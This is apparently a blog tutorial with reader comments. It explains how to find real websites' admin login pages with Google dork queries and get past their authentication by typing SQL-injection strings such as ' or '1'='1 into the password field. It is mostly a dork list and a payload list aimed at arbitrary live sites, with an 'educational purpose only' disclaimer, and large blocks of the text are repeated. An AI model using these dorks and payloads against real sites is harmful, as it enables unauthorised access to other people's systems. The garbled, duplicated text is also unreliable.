Basic sql injection
Gaining authentication bypass on an admin account.
First we need to find a site, start by opening Google.
Now we have to use Google dork:
There is a large number of Google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Gaining authentication bypass on an admin account.
First we need to find a site, start by opening Google.
Now we have to use Google dork:
There is a large number of Google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl: admin.php"
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
there are many more but these are the best ones that i know .So your input should look like this
username:Admin
password:'or'1'='1
So click submit and you'r in.
NOTE: All sites are not vulnerable.
Note: Don't use this method for hacking . This article is for educational purpose only.
"inurl: login/admin.php"
"inurl: admin/login.php"
"inurl: adminlogin.php"
"inurl: adminhome.php"
"inurl: admin_login.php"
"inurl: administratorlogin.php"
"inurl: login/administrator.php"
"inurl: administrator_login.php"
Now what to do once we get to our site.
the site should look something like this :
welcome to xxxxxxxxxx administrator panel
username :
password :
so what we do here is in the username we always type "Admin"
and for our password we type our sql injection
here is a list of sql injections
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
there are many more but these are the best ones that i know .So your input should look like this
username:Admin
password:'or'1'='1
So click submit and you'r in.
NOTE: All sites are not vulnerable.
Note: Don't use this method for hacking . This article is for educational purpose only.
It is one of the best blog for Ethical Hacking Training and Tricks, Thanks to update new new information, keep it up,,,,
ReplyDeleteSysap Technologies thanks for your comment . do contact me if you need any help regarding hacking , web hosting , server side issue and all technical stuff . :) :) :)
ReplyDelete